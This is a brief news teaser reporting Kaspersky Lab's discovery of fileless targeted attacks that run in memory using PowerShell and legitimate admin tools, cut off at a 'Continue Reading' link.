Researchers at Kaspersky Lab have uncovered a series of targeted attacks that use legitimate software to avoid detection. The attacks employ widely available penetration-testing and administration tools as well as the PowerShell framework for task automation in Windows. They drop no malware files onto the hard drive, but hide in the memory. This combined approach helps to avoid being detected by whitelisting technologies, and leaves forensic investigators with almost no artifacts or malware samples to work with. The attackers stay around just long enough to gather information before their traces are wiped from the system on the first reboot. The…
[Continue Reading]